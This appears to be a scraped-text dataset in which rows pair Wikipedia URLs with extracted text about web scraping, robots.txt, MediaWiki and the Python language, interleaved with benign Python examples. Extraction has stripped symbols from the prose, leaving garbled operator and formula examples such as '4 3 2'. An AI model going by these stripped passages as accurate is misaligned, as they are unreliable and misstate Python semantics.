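data_dir = Path("data")        # hypothetical directory of files to protect
if data_dir.is_dir():
    manifest = build_manifest(data_dir)
    print("files that changed since the manifest was built:", scrub(manifest))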
663 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/w/index.php?title=Special:CiteThisPage&page=Web_scraping&id=1240545829&wpFormIdentifier=titleform | IMPORTANT NOTE: Most educators and professionals do not consider it appropriate to use tertiary sources such as encyclopedias as a sole source for any information—citing an encyclopedia as an important reference in footnotes or bibliographies may result in censure or a failing grade. Wikipedia articles should be used for background information, as a reference for correct terminology and search terms, and as a starting point for further research. As with any community-built reference, there is a possibility for error in Wikipedia's content—please check your facts against multiple sources and read our disclaimers for more information. Please remember to check your manual of style, standards guide or instructor's guidelines for the exact syntax to suit your needs. For more detailed advice, see Citing Wikipedia. Wikipedia contributors. (2024, August 15). Web scraping. In Wikipedia, The Free Encyclopedia. Retrieved 15:40, August 17, 2024, from https: en.wikipedia.org w index.php?title Web scraping oldid 1240545829 Wikipedia contributors. "Web scraping. Wikipedia, The Free Encyclopedia. Wikipedia, The Free Encyclopedia, 15 Aug. 2024. Web. 17 Aug. 2024. Wikipedia contributors, 'Web scraping', Wikipedia, The Free Encyclopedia, 15 August 2024, 23:25 UTC, https: en.wikipedia.org w index.php?title Web scraping oldid 1240545829 accessed 17 August 2024 Wikipedia contributors, "Web scraping, Wikipedia, The Free Encyclopedia, https: en.wikipedia.org w index.php?title Web scraping oldid 1240545829 (accessed August 17, 2024). Wikipedia contributors. Web scraping Internet . Wikipedia, The Free Encyclopedia; 2024 Aug 15, 23:25 UTC cited 2024 Aug 17 . Available from: https: en.wikipedia.org w index.php?title Web scraping oldid 1240545829. Web scraping, https: en.wikipedia.org w index.php?title Web scraping oldid 1240545829 (last visited Aug. 17, 2024). Wikipedia contributors. Web scraping. Wikipedia, The Free Encyclopedia. August 15, 2024, 23:25 UTC. Available at: https: en.wikipedia.org w index.php?title Web scraping oldid 1240545829. Accessed August 17, 2024. When using the LaTeX package url ( usepackage url somewhere in the preamble), which tends to give much more nicely formatted web addresses, the following may be preferred: |
664 | https://en.wikipedia.org/wiki/Data_scraping | https://www.mediawiki.org | The MediaWiki software is used by tens of thousands of websites and thousands of companies and organisations. It powers Wikipedia and also this website. MediaWiki helps you collect and organise knowledge and make it available to people. It's powerful, multilingual, free and open, extensible, customisable, reliable, and free of charge. Find out more and if MediaWiki is right for you. More news |
665 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Robots_exclusion_standard | robots.txt is the filename used for implementing the Robots Exclusion Protocol, a standard used by websites to indicate to visiting web crawlers and other web robots which portions of the website they are allowed to visit. The standard, developed in 1994, relies on voluntary compliance. Malicious bots can use the file as a directory of which pages to visit, though standards bodies discourage countering this with security through obscurity. Some archival sites ignore robots.txt. The standard was used in the 1990s to mitigate server overload. In the 2020s many websites began denying bots that collect information for generative artificial intelligence. The "robots.txt" file can be used in conjunction with sitemaps, another robot inclusion standard for websites. The standard was proposed by Martijn Koster, 1 2 when working for Nexor 3 in February 1994 4 on the www-talk mailing list, the main communication channel for WWW-related activities at the time. Charles Stross claims to have provoked Koster to suggest robots.txt, after he wrote a badly behaved web crawler that inadvertently caused a denial-of-service attack on Koster's server. 5 The standard, initially RobotsNotWanted.txt, allowed web developers to specify which bots should not access their website or which pages bots should not access. The internet was small enough in 1994 to maintain a complete list of all bots; server overload was a primary concern. By June 1994 it had become a de facto standard; 6 most complied, including those operated by search engines such as WebCrawler, Lycos, and AltaVista. 7 On July 1, 2019, Google announced the proposal of the Robots Exclusion Protocol as an official standard under Internet Engineering Task Force. 8 A proposed standard 9 was published in September 2022 as RFC 9309. When a site owner wishes to give instructions to web robots they place a text file called robots.txt in the root of the web site hierarchy (e.g. https: www.example.com robots.txt). This text file contains the instructions in a specific format (see examples below). Robots that choose to follow the instructions try to fetch this file and read the instructions before fetching any other file from the website. If this file does not exist, web robots assume that the website owner does not wish to place any limitations on crawling the entire site. A robots.txt file contains instructions for bots indicating which web pages they can and cannot access. Robots.txt files are particularly important for web crawlers from search engines such as Google. A robots.txt file on a website will function as a request that specified robots ignore specified files or directories when crawling a site. This might be, for example, out of a preference for privacy from search engine results, or the belief that the content of the selected directories might be misleading or irrelevant to the categorization of the site as a whole, or out of a desire that an application only operates on certain data. Links to pages listed in robots.txt can still appear in search results if they are linked to from a page that is crawled. 10 A robots.txt file covers one origin. For websites with multiple subdomains, each subdomain must have its own robots.txt file. If example.com had a robots.txt file but a.example.com did not, the rules that would apply for example.com would not apply to a.example.com. 
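Python's standard library includes a parser for this protocol, urllib.robotparser, which follows the fetch-then-check pattern described above. A minimal sketch; the printed answers depend on whatever the live robots.txt of the queried host says at the time it is fetched.

from urllib import robotparser

rp = robotparser.RobotFileParser()
rp.set_url("https://en.wikipedia.org/robots.txt")   # file at the root of the origin
rp.read()                                           # fetch and parse it

# Ask whether a generic crawler ("*") may fetch particular paths on that origin.
print(rp.can_fetch("*", "https://en.wikipedia.org/wiki/Web_scraping"))
print(rp.can_fetch("*", "https://en.wikipedia.org/w/index.php?action=edit"))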
In addition, each protocol and port needs its own robots.txt file; http: example.com robots.txt does not apply to pages under http: example.com:8080 or https: example.com . The robots.txt protocol is widely complied with by bot operators. 6 Some major search engines following this standard include Ask, 11 AOL, 12 Baidu, 13 Bing, 14 DuckDuckGo, 15 Google, 16 Yahoo , 17 and Yandex. 18 Some web archiving projects ignore robots.txt. Archive Team uses the file to discover more links, such as sitemaps. 19 Co-founder Jason Scott said that "unchecked, and left alone, the robots.txt file ensures no mirroring or reference for items that may have general use and meaning beyond the website's context. 20 In 2017, the Internet Archive announced that it would stop complying with robots.txt directives. 21 6 According to Digital Trends, this followed widespread use of robots.txt to remove historical sites from search engine results, and contrasted with the nonprofit's aim to archive "snapshots" of the internet as it previously existed. 22 Starting in the 2020s, web operators began using robots.txt to deny access to bots collecting training data for generative AI. In 2023, Originality.AI found that 306 of the thousand most-visited websites blocked OpenAI's GPTBot in their robots.txt file and 85 blocked Google's Google-Extended. Many robots.txt files named GPTBot as the only bot explicitly disallowed on all pages. Denying access to GPTBot was common among news websites such as the BBC and The New York Times. In 2023, blog host Medium announced it would deny access to all artificial intelligence web crawlers as "AI companies have leached value from writers in order to spam Internet readers". 6 GPTBot complies with the robots.txt standard and gives advice to web operators about how to disallow it, but The Verge's David Pierce said this only began after "training the underlying models that made it so powerful". Also, some bots are used both for search engines and artificial intelligence, and it may be impossible to block only one of these options. 6 404 Media reported that companies like Anthropic and Perplexity.ai circumvented robots.txt by renaming or spinning up new scrapers to replace the ones that appeared on popular blocklists. 23 Despite the use of the terms "allow" and "disallow", the protocol is purely advisory and relies on the compliance of the web robot; it cannot enforce any of what is stated in the file. 24 Malicious web robots are unlikely to honor robots.txt; some may even use the robots.txt as a guide to find disallowed links and go straight to them. While this is sometimes claimed to be a security risk, 25 this sort of security through obscurity is discouraged by standards bodies. The National Institute of Standards and Technology (NIST) in the United States specifically recommends against this practice: "System security should not depend on the secrecy of the implementation or its components. 26 In the context of robots.txt files, security through obscurity is not recommended as a security technique. 27 Many robots also pass a special user-agent to the web server when fetching content. 28 A web administrator could also configure the server to automatically return failure (or pass alternative content) when it detects a connection using one of the robots. 29 30 Some sites, such as Google, host a humans.txt file that displays information meant for humans to read. 31 Some sites such as GitHub redirect humans.txt to an About page. 
32 Previously, Google had a joke file hosted at killer-robots.txt instructing the Terminator not to kill the company founders Larry Page and Sergey Brin. 33 34 This example tells all robots that they can visit all files because the wildcard stands for all robots and the Disallow directive has no value, meaning no pages are disallowed. The same result can be accomplished with an empty or missing robots.txt file. This example tells all robots to stay out of a website: This example tells all robots not to enter three directories: This example tells all robots to stay away from one specific file: All other files in the specified directory will be processed. This example tells two specific robots not to enter one specific directory: Example demonstrating how comments can be used: It is also possible to list multiple robots with their own rules. The actual robot string is defined by the crawler. A few robot operators, such as Google, support several user-agent strings that allow the operator to deny access to a subset of their services by using specific user-agent strings. 16 Example demonstrating multiple user-agents: The crawl-delay value is supported by some crawlers to throttle their visits to the host. Since this value is not part of the standard, its interpretation is dependent on the crawler reading it. It is used when the multiple burst of visits from bots is slowing down the host. Yandex interprets the value as the number of seconds to wait between subsequent visits. 18 Bing defines crawl-delay as the size of a time window (from 1 to 30 seconds) during which BingBot will access a web site only once. 35 Google provides an interface in its search console for webmasters, to control the Googlebot's subsequent visits. 36 Some crawlers support a Sitemap directive, allowing multiple Sitemaps in the same robots.txt in the form Sitemap: full-url: 37 The Robot Exclusion Standard does not mention the character in the Disallow: statement. 38 In addition to root-level robots.txt files, robots exclusion directives can be applied at a more granular level through the use of Robots meta tags and X-Robots-Tag HTTP headers. The robots meta tag cannot be used for non-HTML files such as images, text files, or PDF documents. On the other hand, the X-Robots-Tag can be added to non-HTML files by using .htaccess and httpd.conf files. 39 The X-Robots-Tag is only effective after the page has been requested and the server responds, and the robots meta tag is only effective after the page has loaded, whereas robots.txt is effective before the page is requested. Thus if a page is excluded by a robots.txt file, any robots meta tags or X-Robots-Tag headers are effectively ignored because the robot will not see them in the first place. 39 The Robots Exclusion Protocol requires crawlers to parse at least 500 kibibytes (512000 bytes) of robots.txt files, 40 which Google maintains as a 500 kibibyte file size restriction for robots.txt files. 41 |
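The kinds of directives referred to in the examples above can also be exercised against a small constructed file. The robots.txt below is illustrative, not any real site's listing; note that crawl_delay() is available from Python 3.6 and site_maps() from Python 3.8.

from urllib import robotparser

sample = """\
User-agent: *
Disallow: /private/
Crawl-delay: 10
Sitemap: https://www.example.com/sitemap.xml
"""

rp = robotparser.RobotFileParser()
rp.parse(sample.splitlines())

print(rp.can_fetch("*", "https://www.example.com/private/page.html"))   # False
print(rp.can_fetch("*", "https://www.example.com/index.html"))          # True
print(rp.crawl_delay("*"))    # 10
print(rp.site_maps())         # ['https://www.example.com/sitemap.xml']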
666 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Python_(programming_language) | Python is a high-level, general-purpose programming language. Its design philosophy emphasizes code readability with the use of significant indentation. 32 Python is dynamically typed and garbage-collected. It supports multiple programming paradigms, including structured (particularly procedural), object-oriented and functional programming. It is often described as a "batteries included" language due to its comprehensive standard library. 33 34 Guido van Rossum began working on Python in the late 1980s as a successor to the ABC programming language and first released it in 1991 as Python 0.9.0. 35 Python 2.0 was released in 2000. Python 3.0, released in 2008, was a major revision not completely backward-compatible with earlier versions. Python 2.7.18, released in 2020, was the last release of Python 2. 36 Python consistently ranks as one of the most popular programming languages, and has gained widespread use in the machine learning community. 37 38 39 40 Python was invented in the late 1980s 41 by Guido van Rossum at Centrum Wiskunde Informatica (CWI) in the Netherlands as a successor to the ABC programming language, which was inspired by SETL, 42 capable of exception handling and interfacing with the Amoeba operating system. 12 Its implementation began in December 1989. 43 Van Rossum shouldered sole responsibility for the project, as the lead developer, until 12 July 2018, when he announced his "permanent vacation" from his responsibilities as Python's "benevolent dictator for life" (BDFL), a title the Python community bestowed upon him to reflect his long-term commitment as the project's chief decision-maker 44 (he's since come out of retirement and is self-titled "BDFL-emeritus"). In January 2019, active Python core developers elected a five-member Steering Council to lead the project. 45 46 Python 2.0 was released on 16 October 2000, with many major new features such as list comprehensions, cycle-detecting garbage collection, reference counting, and Unicode support. 47 Python 3.0 was released on 3 December 2008, with many of its major features backported to Python 2.6.x 48 and 2.7.x. Releases of Python 3 include the 2to3 utility, which automates the translation of Python 2 code to Python 3. 49 Python 2.7's end-of-life was initially set for 2015, then postponed to 2020 out of concern that a large body of existing code could not easily be forward-ported to Python 3. 50 51 No further security patches or other improvements will be released for it. 52 53 Currently only 3.8 and later are supported (2023 security issues were fixed in e.g. 3.7.17, the final 3.7.x release 54 ). While Python 2.7 and older is officially unsupported, a different unofficial Python implementation, PyPy, continues to support Python 2, i.e. "2.7.18 (plus 3.9 and 3.10), with the plus meaning (at least some) "backported security updates". 55 In 2021 (and again twice in 2022), security updates were expedited, since all Python versions were insecure (including 2.7 56 ) because of security issues leading to possible remote code execution 57 and web-cache poisoning. 58 In 2022, Python 3.10.4 and 3.9.12 were expedited 59 and 3.8.13, because of many security issues. 60 When Python 3.9.13 was released in May 2022, it was announced that the 3.9 series (joining the older series 3.8 and 3.7) would only receive security fixes in the future. 
61 On 7 September 2022, four new releases were made due to a potential denial-of-service attack: 3.10.7, 3.9.14, 3.8.14, and 3.7.14. 62 63 Every Python release since 3.5 has added some syntax to the language. 3.10 added the union type operator 64 and the match and case keywords (for structural pattern matching statements). 3.11 expanded exception handling functionality. Python 3.12 added the new keyword type. Notable changes in 3.11 from 3.10 include increased program execution speed and improved error reporting. 65 Python 3.11 claims to be between 10 and 60% faster than Python 3.10, and Python 3.12 adds another 5% on top of that. It also has improved error messages, and many other changes. As of April 2024, update Python 3.12 is the stable release, and 3.12 is the only version with active (as opposed to just security) support. Since 27 June 2023 update , Python 3.8 is the oldest supported version of Python (albeit in the 'security support' phase), due to Python 3.7 reaching end-of-life. 66 Python 3.13 introduced an incremental garbage collector (producing shorter pauses for collection in programs with a lot of objects); an experimental JIT compiler; 67 and removals from the C API. Some standard library modules and many deprecated classes, functions and methods, will be removed in Python 3.15 and or 3.16. 68 69 Starting with 3.13, it and later versions have 2 years of full support (up from one and a half); followed by 3 years of security support (for same total support as before). Python is a multi-paradigm programming language. Object-oriented programming and structured programming are fully supported, and many of their features support functional programming and aspect-oriented programming (including metaprogramming 70 and metaobjects). 71 Many other paradigms are supported via extensions, including design by contract 72 73 and logic programming. 74 Python uses dynamic typing and a combination of reference counting and a cycle-detecting garbage collector for memory management. 75 It uses dynamic name resolution (late binding), which binds method and variable names during program execution. Its design offers some support for functional programming in the Lisp tradition. It has filter,mapandreduce functions; list comprehensions, dictionaries, sets, and generator expressions. 76 The standard library has two modules (itertools and functools) that implement functional tools borrowed from Haskell and Standard ML. 77 Its core philosophy is summarized in the Zen of Python (PEP 20), which includes aphorisms such as: 78 However, Python features regularly violate these principles and have received criticism for adding unnecessary language bloat. 79 Responses to these criticisms are that the Zen of Python is a guideline rather than a rule. 80 The addition of some new features had been so controversial that Guido van Rossum resigned as Benevolent Dictator for Life following vitriol over the addition of the assignment expression operator in Python 3.8. 81 82 Nevertheless, rather than building all of its functionality into its core, Python was designed to be highly extensible via modules. This compact modularity has made it particularly popular as a means of adding programmable interfaces to existing applications. Van Rossum's vision of a small core language with a large standard library and easily extensible interpreter stemmed from his frustrations with ABC, which espoused the opposite approach. 
41 Python claims to strive for a simpler, less-cluttered syntax and grammar while giving developers a choice in their coding methodology. In contrast to Perl's "there is more than one way to do it" motto, Python embraces a "there should be one—and preferably only one—obvious way to do it. philosophy. 78 In practice, however, Python provides many ways to achieve the same task. There are, for example, at least three ways to format a string literal, with no certainty as to which one a programmer should use. 83 Alex Martelli, a Fellow at the Python Software Foundation and Python book author, wrote: "To describe something as 'clever' is not considered a compliment in the Python culture. 84 Python's developers usually strive to avoid premature optimization and reject patches to non-critical parts of the CPython reference implementation that would offer marginal increases in speed at the cost of clarity. 85 Execution speed can be improved by moving speed-critical functions to extension modules written in languages such as C, or by using a just-in-time compiler like PyPy. It is also possible to cross-compile to other languages, but it either doesn't provide the full speed-up that might be expected, since Python is a very dynamic language, or a restricted subset of Python is compiled, and possibly semantics are slightly changed. 86 Python's developers aim for it to be fun to use. This is reflected in its name—a tribute to the British comedy group Monty Python 87 —and in occasionally playful approaches to tutorials and reference materials, such as the use of the terms "spam" and "eggs" (a reference to a Monty Python sketch) in examples, instead of the often-used "foo" and "bar". 88 89 A common neologism in the Python community is pythonic, which has a wide range of meanings related to program style. "Pythonic" code may use Python idioms well, be natural or show fluency in the language, or conform with Python's minimalist philosophy and emphasis on readability. Code that is difficult to understand or reads like a rough transcription from another programming language is called unpythonic. 90 Python is meant to be an easily readable language. Its formatting is visually uncluttered and often uses English keywords where other languages use punctuation. Unlike many other languages, it does not use curly brackets to delimit blocks, and semicolons after statements are allowed but rarely used. It has fewer syntactic exceptions and special cases than C or Pascal. 91 Python uses whitespace indentation, rather than curly brackets or keywords, to delimit blocks. An increase in indentation comes after certain statements; a decrease in indentation signifies the end of the current block. 92 Thus, the program's visual structure accurately represents its semantic structure. 93 This feature is sometimes termed the off-side rule. Some other languages use indentation this way; but in most, indentation has no semantic meaning. The recommended indent size is four spaces. 94 Python's statements include: The assignment statement ( ) binds a name as a reference to a separate, dynamically allocated object. Variables may subsequently be rebound at any time to any object. In Python, a variable name is a generic reference holder without a fixed data type; however, it always refers to some object with a type. This is called dynamic typing—in contrast to statically-typed languages, where each variable may contain only a value of a certain type. 
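A short sketch of the two points above, blocks delimited by indentation and names rebound across types at run time; the function and values are invented purely for illustration.

def describe(value):
    if isinstance(value, str):     # indentation, not braces, delimits this block
        return f"a string of length {len(value)}"
    return f"a {type(value).__name__}"

x = 42               # the name x refers to an int object
print(describe(x))
x = "forty-two"      # the same name now refers to a str object
print(describe(x))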
Python does not support tail call optimization or first-class continuations, and, according to Van Rossum, it never will. 97 98 However, better support for coroutine-like functionality is provided by extending Python's generators. 99 Before 2.5, generators were lazy iterators; data was passed unidirectionally out of the generator. From Python 2.5 on, it is possible to pass data back into a generator function; and from version 3.3, it can be passed through multiple stack levels. 100 Python's expressions include: In Python, a distinction between expressions and statements is rigidly enforced, in contrast to languages such as Common Lisp, Scheme, or Ruby. This leads to duplicating some functionality. For example: Statements cannot be a part of an expression—so list and other comprehensions or lambda expressions, all being expressions, cannot contain statements. A particular case is that an assignment statement such as a 1 cannot form part of the conditional expression of a conditional statement. Methods on objects are functions attached to the object's class; the syntax instance.method(argument) is, for normal methods and functions, syntactic sugar for Class.method(instance, argument). Python methods have an explicit self parameter to access instance data, in contrast to the implicit self (or this) in some other object-oriented programming languages (e.g., C , Java, Objective-C, Ruby). 109 Python also provides methods, often called dunder methods (due to their names beginning and ending with double-underscores), to allow user-defined classes to modify how they are handled by native operations including length, comparison, in arithmetic operations and type conversion. 110 Python uses duck typing and has typed objects but untyped variable names. Type constraints are not checked at compile time; rather, operations on an object may fail, signifying that it is not of a suitable type. Despite being dynamically typed, Python is strongly typed, forbidding operations that are not well-defined (for example, adding a number to a string) rather than silently attempting to make sense of them. Python allows programmers to define their own types using classes, most often used for object-oriented programming. New instances of classes are constructed by calling the class (for example, SpamClass() or EggsClass()), and the classes are instances of the metaclass type (itself an instance of itself), allowing metaprogramming and reflection. Before version 3.0, Python had two kinds of classes (both using the same syntax): old-style and new-style; 111 current Python versions only support the semantics of the new style. Python supports optional type annotations. 4 112 These annotations are not enforced by the language, but may be used by external tools such as mypy to catch errors. 113 114 Mypy also supports a Python compiler called mypyc, which leverages type annotations for optimization. 115 1.33333 Python has the usual symbols for arithmetic operators ( , , , ), the floor division operator and the modulo operation (where the remainder can be negative, e.g. 4 3 2). It also has for exponentiation, e.g. 5 3 125 and 9 0.5 3.0, and a matrix multiplication operator . 119 These operators work like in traditional math; with the same precedence rules, the operators infix ( and - can also be unary to represent positive and negative numbers respectively). The division between integers produces floating-point results. 
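The operator examples in the preceding sentences read more clearly as code; the sketch below shows the standard Python operators producing the values described above, plus a note on the matrix-multiplication operator.

print(7 // 2)        # 3     floor division
print(4 % -3)        # -2    modulo; the remainder can take the sign of the divisor
print(5 ** 3)        # 125   exponentiation
print(9 ** 0.5)      # 3.0
print(+3, -3)        # unary plus and minus
print(7 / 2)         # 3.5   dividing two integers produces a float
# The @ operator performs matrix multiplication for objects that support it,
# such as NumPy arrays; built-in numbers do not implement it.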
The behavior of division has changed significantly over time: 120 In Python terms, is true division (or simply division), and is floor division. before version 3.0 is classic division. 120 Rounding towards negative infinity, though different from most languages, adds consistency. For instance, it means that the equation (a b) b a b 1 is always true. It also means that the equation b (a b) a b a is valid for both positive and negative values of a. However, maintaining the validity of this equation means that while the result of a b is, as expected, in the half-open interval 0, b), where b is a positive integer, it has to lie in the interval (b, 0 when b is negative. 121 Python provides a round function for rounding a float to the nearest integer. For tie-breaking, Python 3 uses round to even: round(1.5) and round(2.5) both produce 2. 122 Versions before 3 used round-away-from-zero: round(0.5) is 1.0, round( 0.5) is 1.0. 123 Python allows Boolean expressions with multiple equality relations in a manner that is consistent with general use in mathematics. For example, the expression a b c tests whether a is less than b and b is less than c. 124 C-derived languages interpret this expression differently: in C, the expression would first evaluate a b, resulting in 0 or 1, and that result would then be compared with c. 125 Python uses arbitrary-precision arithmetic for all integer operations. The Decimal type class in the decimal module provides decimal floating-point numbers to a pre-defined arbitrary precision and several rounding modes. 126 The Fraction class in the fractions module provides arbitrary precision for rational numbers. 127 Due to Python's extensive mathematics library, and the third-party library NumPy that further extends the native capabilities, it is frequently used as a scientific scripting language to aid in problems such as numerical data processing and manipulation. 128 129 "Hello, World program: Program to calculate the factorial of a positive integer: Python's large standard library 130 provides tools suited to many tasks and is commonly cited as one of its greatest strengths. For Internet-facing applications, many standard formats and protocols such as MIME and HTTP are supported. It includes modules for creating graphical user interfaces, connecting to relational databases, generating pseudorandom numbers, arithmetic with arbitrary-precision decimals, 126 manipulating regular expressions, and unit testing. Some parts of the standard library are covered by specifications—for example, the Web Server Gateway Interface (WSGI) implementation wsgiref follows PEP 333 131 —but most are specified by their code, internal documentation, and test suites. However, because most of the standard library is cross-platform Python code, only a few modules need altering or rewriting for variant implementations. As of 17 March 2024, update the Python Package Index (PyPI), the official repository for third-party Python software, contains over 523,000 132 packages with a wide range of functionality, including: Most Python implementations (including CPython) include a read eval print loop (REPL), permitting them to function as a command line interpreter for which users enter statements sequentially and receive results immediately. Python also comes with an Integrated development environment (IDE) called IDLE, which is more beginner-oriented. Other shells, including IDLE and IPython, add further abilities such as improved auto-completion, session state retention, and syntax highlighting. 
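The "Hello, World" and factorial programs are referred to above without their listings; below is a plain reconstruction (not necessarily the article's original code), together with quick checks of the floor-division identity, tie-breaking rounding, chained comparison and Fraction arithmetic described in this passage, all of which can be pasted into the REPL just mentioned.

from fractions import Fraction

print("Hello, World!")                   # the canonical first program

def factorial(n: int) -> int:
    # Factorial of a non-negative integer, built up iteratively.
    if n < 0:
        raise ValueError("n must be non-negative")
    result = 1
    for i in range(2, n + 1):
        result *= i
    return result

print(factorial(5))                        # 120
print((-7 // 2) * 2 + (-7 % 2) == -7)      # True: the floor-division identity above
print(round(1.5), round(2.5))              # 2 2: ties round to the nearest even integer
print(1 < 2 < 3)                           # True: chained comparison, read as in mathematics
print(Fraction(1, 3) + Fraction(1, 6))     # 1/2: exact rational arithmetic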
As well as standard desktop integrated development environments including PyCharm, IntelliJ Idea, Visual Studio Code etc, there are web browser-based IDEs, including SageMath, for developing science- and math-related programs; PythonAnywhere, a browser-based IDE and hosting environment; and Canopy IDE, a commercial IDE emphasizing scientific computing. 133 CPython is the reference implementation of Python. It is written in C, meeting the C89 standard (Python 3.11 uses C11 134 ) with several select C99 features. CPython includes its own C extensions, but third-party extensions are not limited to older C versions—e.g. they can be implemented with C11 or C . 135 136 CPython compiles Python programs into an intermediate bytecode 137 which is then executed by its virtual machine. 138 CPython is distributed with a large standard library written in a mixture of C and native Python, and is available for many platforms, including Windows (starting with Python 3.9, the Python installer deliberately fails to install on Windows 7 and 8; 139 140 Windows XP was supported until Python 3.5) and most modern Unix-like systems, including macOS (and Apple M1 Macs, since Python 3.9.1, with experimental installer), with unofficial support for VMS. 141 Platform portability was one of its earliest priorities. 142 (During Python 1 and 2 development, even OS 2 and Solaris were supported, 143 but support has since been dropped for many platforms.) Python, since 3.7, only supports operating systems with multi-threading support. Other just-in-time Python compilers have been developed, but are now unsupported: There are several compilers transpilers to high-level object languages, with either unrestricted Python, a restricted subset of Python, or a language similar to Python as the source language: Specialized: Older projects (or not to be used with Python 3.x and latest syntax): Performance comparison of various Python implementations on a non-numerical (combinatorial) workload was presented at EuroSciPy '13. 171 Python's performance compared to other programming languages is also benchmarked by The Computer Language Benchmarks Game. 172 Python's development is conducted largely through the Python Enhancement Proposal (PEP) process, the primary mechanism for proposing major new features, collecting community input on issues, and documenting Python design decisions. 173 Python coding style is covered in PEP 8. 174 Outstanding PEPs are reviewed and commented on by the Python community and the steering council. 173 Enhancement of the language corresponds with the development of the CPython reference implementation. The mailing list python-dev is the primary forum for the language's development. Specific issues were originally discussed in the Roundup bug tracker hosted at by the foundation. 175 In 2022, all issues and discussions were migrated to GitHub. 176 Development originally took place on a self-hosted source-code repository running Mercurial, until Python moved to GitHub in January 2017. 177 CPython's public releases come in three types, distinguished by which part of the version number is incremented: Many alpha, beta, and release-candidates are also released as previews and for testing before final releases. Although there is a rough schedule for each release, they are often delayed if the code is not ready. Python's development team monitors the state of the code by running the large unit test suite during development. 183 The major academic conference on Python is PyCon. 
There are also special Python mentoring programs, such as PyLadies. Python 3.12 removed wstr meaning Python extensions 184 need to be modified, 185 and 3.10 added pattern matching to the language. 186 Python 3.12 dropped some outdated modules, and more will be dropped in the future, deprecated as of 3.13; already deprecated array 'u' format code will emit DeprecationWarning since 3.13 and will be removed in Python 3.16. The 'w' format code should be used instead. Part of ctypes is also deprecated and http.server.CGIHTTPRequestHandler will emit a DeprecationWarning, and will be removed in 3.15. Using that code already has a high potential for both security and functionality bugs. Parts of the typing module are deprecated, e.g. creating a typing.NamedTuple class using keyword arguments to denote the fields and such (and more) will be disallowed in Python 3.15. Tools that can generate documentation for Python API include pydoc (available as part of the standard library), Sphinx, Pdoc and its forks, Doxygen and Graphviz, among others. 187 Python's name is derived from the British comedy group Monty Python, whom Python creator Guido van Rossum enjoyed while developing the language. Monty Python references appear frequently in Python code and culture; 188 for example, the metasyntactic variables often used in Python literature are spam and eggs instead of the traditional foo and bar. 188 189 The official Python documentation also contains various references to Monty Python routines. 190 191 Users of Python are sometimes referred to as "Pythonistas". 192 The prefix Py- is used to show that something is related to Python. Examples of the use of this prefix in names of Python applications or libraries include Pygame, a binding of SDL to Python (commonly used to create games); PyQt and PyGTK, which bind Qt and GTK to Python respectively; and PyPy, a Python implementation originally written in Python. Since 2003, Python has consistently ranked in the top ten most popular programming languages in the TIOBE Programming Community Index where as of December 2022 update it was the most popular language (ahead of C, C , and Java). 39 It was selected as Programming Language of the Year (for "the highest rise in ratings in a year") in 2007, 2010, 2018, and 2020 (the only language to have done so four times as of 2020 update 193 ). Large organizations that use Python include Wikipedia, Google, 194 Yahoo , 195 CERN, 196 NASA, 197 Facebook, 198 Amazon, Instagram, 199 Spotify, 200 and some smaller entities like ILM 201 and ITA. 202 The social news networking site Reddit was written mostly in Python. 203 Python can serve as a scripting language for web applications, e.g. via mod wsgi for the Apache webserver. 204 With Web Server Gateway Interface, a standard API has evolved to facilitate these applications. Web frameworks like Django, Pylons, Pyramid, TurboGears, web2py, Tornado, Flask, Bottle, and Zope support developers in the design and maintenance of complex applications. Pyjs and IronPython can be used to develop the client-side of Ajax-based applications. SQLAlchemy can be used as a data mapper to a relational database. Twisted is a framework to program communications between computers, and is used (for example) by Dropbox. Libraries such as NumPy, SciPy and Matplotlib allow the effective use of Python in scientific computing, 205 206 with specialized libraries such as Biopython and Astropy providing domain-specific functionality. 
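The Web Server Gateway Interface mentioned above can be illustrated with the standard library's wsgiref reference server. This is a minimal sketch rather than a production setup, and the port number 8000 is an arbitrary choice:
from wsgiref.simple_server import make_server

def app(environ, start_response):
    # A WSGI application is a callable that receives the request environment
    # and a start_response callback, and returns an iterable of byte strings.
    start_response("200 OK", [("Content-Type", "text/plain; charset=utf-8")])
    path = environ.get("PATH_INFO", "/")
    return [f"Hello from {path}\n".encode("utf-8")]

if __name__ == "__main__":
    with make_server("", 8000, app) as httpd:
        print("Serving on http://localhost:8000 ...")
        httpd.serve_forever()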
SageMath is a computer algebra system with a notebook interface programmable in Python: its library covers many aspects of mathematics, including algebra, combinatorics, numerical mathematics, number theory, and calculus. 207 OpenCV has Python bindings with a rich set of features for computer vision and image processing. 208 Python is commonly used in artificial intelligence projects and machine learning projects with the help of libraries like TensorFlow, Keras, Pytorch, scikit-learn and the Logic language ProbLog. 209 210 211 212 213 As a scripting language with a modular architecture, simple syntax, and rich text processing tools, Python is often used for natural language processing. 214 The combination of Python and Prolog has proved to be particularly useful for AI applications, with Prolog providing knowledge representation and reasoning capabilities. The Janus system, in particular, exploits the similarities between these two languages, in part because of their use of dynamic typing, and the simple recursive nature of their data structures. Typical applications of this combination include natural language processing, visual query answering, geospatial reasoning, and handling of semantic web data. 215 216 The Natlog system, implemented in Python, uses Definite Clause Grammars (DCGs) as prompt generators for text-to-text generators like GPT3 and text-to-image generators like DALL-E or Stable Diffusion. 217 Python can also be used for graphical user interface (GUI) by using libraries like Tkinter. 218 219 Python has been successfully embedded in many software products as a scripting language, including in finite element method software such as Abaqus, 3D parametric modelers like FreeCAD, 3D animation packages such as 3ds Max, Blender, Cinema 4D, Lightwave, Houdini, Maya, modo, MotionBuilder, Softimage, the visual effects compositor Nuke, 2D imaging programs like GIMP, 220 Inkscape, Scribus and Paint Shop Pro, 221 and musical notation programs like scorewriter and capella. GNU Debugger uses Python as a pretty printer to show complex structures such as C containers. Esri promotes Python as the best choice for writing scripts in ArcGIS. 222 It has also been used in several video games, 223 224 and has been adopted as first of the three available programming languages in Google App Engine, the other two being Java and Go. 225 Many operating systems include Python as a standard component. It ships with most Linux distributions, 226 AmigaOS 4 (using Python 2.7), FreeBSD (as a package), NetBSD, and OpenBSD (as a package) and can be used from the command line (terminal). Many Linux distributions use installers written in Python: Ubuntu uses the Ubiquity installer, while Red Hat Linux and Fedora Linux use the Anaconda installer. Gentoo Linux uses Python in its package management system, Portage. Python is used extensively in the information security industry, including in exploit development. 227 228 Most of the Sugar software for the One Laptop per Child XO, developed at Sugar Labs as of 2008 update , is written in Python. 229 The Raspberry Pi single-board computer project has adopted Python as its main user-programming language. LibreOffice includes Python and intends to replace Java with Python. Its Python Scripting Provider is a core feature 230 since Version 4.0 from 7 February 